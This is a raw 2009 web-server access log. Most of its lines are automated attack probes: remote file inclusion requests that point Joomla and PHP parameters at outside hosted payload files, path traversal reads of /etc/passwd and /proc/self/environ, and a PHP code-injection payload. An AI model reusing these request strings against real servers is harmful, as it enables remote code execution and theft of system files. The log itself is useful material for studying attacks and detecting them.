206.225.23.4 - - [18/Jul/2009:03:26:55 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:26:55 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:27:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.110.97.12 - - [18/Jul/2009:03:27:38 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
204.30.3.225 - - [18/Jul/2009:03:27:40 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:27:44 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:08 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:28 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:30 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:30 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:30 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:46 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:46 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:28:54 -0400] "GET /cyberfolio/portfolio/msg/view.php?av=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:28:55 -0400] "GET /logs/access_log.Q109051100/cyberfolio/portfolio/msg/view.php?av=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:28:55 -0400] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:58 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:58 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:28:58 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.120.227.242 - - [18/Jul/2009:03:29:00 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
204.30.3.225 - - [18/Jul/2009:03:29:00 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:29:00 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:29:01 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:29:14 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:29:20 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:29:21 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:29:22 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
204.30.3.225 - - [18/Jul/2009:03:30:25 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:30:36 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
74.223.143.131 - - [18/Jul/2009:03:30:40 -0400] "GET /logs/access_log.Q109062200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:40 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:40 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:40 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:41 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:41 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:41 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:30:46 -0400] "GET /logs/access_log.Q109062200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:30:46 -0400] "GET /logs/access_log.Q109053000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:30:47 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:31:28 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:31:28 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:31:29 -0400] "GET /logs/access_log.Q109071000/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:31:30 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:31:32 -0400] "GET /logs/access_log.Q109051100%20%20/cyberfolio/portfolio/msg/view.php?av=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:32:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.51.115 - - [18/Jul/2009:03:32:35 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
114.200.199.144 - - [18/Jul/2009:03:33:04 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:04 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:05 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:13 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:33:14 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:33:15 -0400] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:33:28 -0400] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:33:28 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:37 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 200 10000 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:37 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:37 -0400] "GET /logs/access_log.Q109061900%20%20///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:33:37 -0400] "GET /logs/access_log.Q109051100%20%20///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:33:49 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:33:53 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
124.0.145.1 - - [18/Jul/2009:03:33:54 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:03:33:54 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:03:33:54 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:34:03 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
124.0.145.1 - - [18/Jul/2009:03:34:26 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:34:51 -0400] "GET /logs/access_log.Q109062700/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:35:21 -0400] "GET /logs/access_log.Q109052700/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:35:40 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:35:41 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:35:41 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
115.92.96.43 - - [18/Jul/2009:03:36:37 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:03:36:51 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
66.249.68.247 - - [18/Jul/2009:03:37:03 -0400] "GET /images/nav_store_cart_grn.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
213.149.105.8 - - [18/Jul/2009:03:37:09 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:03:37:09 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:03:37:09 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:37:12 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:37:12 -0400] "GET /logs/access_log.Q109071000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:37:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [18/Jul/2009:03:37:26 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:03:37:32 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:03:37:32 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:03:37:32 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:03:37:48 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 76277 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.96.135.55 - - [18/Jul/2009:03:37:51 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.191.11.195 - - [18/Jul/2009:03:38:03 -0400] "GET /logs/access_log.Q109061200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
89.191.11.195 - - [18/Jul/2009:03:38:04 -0400] "GET /logs/access_log.Q109061200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
89.191.11.195 - - [18/Jul/2009:03:38:04 -0400] "GET /logs/access_log.Q109061200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:38:04 -0400] "GET /logs/access_log.Q109061200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
221.143.51.115 - - [18/Jul/2009:03:38:14 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
70.168.96.43 - - [18/Jul/2009:03:38:21 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:03:38:21 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:03:38:22 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:38:43 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:38:45 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:03:39:53 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
70.168.96.43 - - [18/Jul/2009:03:40:18 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
80.60.154.37 - - [18/Jul/2009:03:40:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/conventions.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; nl-nl) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
80.60.154.37 - - [18/Jul/2009:03:40:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/conventions.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; nl-nl) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.200.199.144 - - [18/Jul/2009:03:41:01 -0400] "GET /logs/access_log.Q109071100///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:03:41:14 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
213.149.105.8 - - [18/Jul/2009:03:41:16 -0400] "GET /logs/access_log.Q109063000%20%20/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:03:41:23 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.11 - - [18/Jul/2009:03:41:24 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
114.200.199.144 - - [18/Jul/2009:03:41:26 -0400] "GET /logs/access_log.Q109071000///?_SERVER[DOCUMENT_ROOT]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:03:41:27 -0400] "GET /logs/access_log.Q109051400%20%20/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:41:33 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/idfellscan.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
110.45.145.92 - - [18/Jul/2009:03:41:33 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/idfellscan.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
110.45.145.92 - - [18/Jul/2009:03:41:34 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/idfellscan.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
216.117.172.131 - - [18/Jul/2009:03:41:54 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:41:54 -0400] "GET /logs/error_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:41:54 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:03:42:03 -0400] "GET /logs/access_log.Q109050800//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.117.172.131 - - [18/Jul/2009:03:42:04 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:42:04 -0400] "GET /logs/error_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:42:04 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:42:17 -0400] "GET /logs/access_log.Q109050800//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/idfellscan.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
203.57.78.8 - - [18/Jul/2009:03:42:24 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:03:42:24 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:03:42:24 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:03:42:26 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
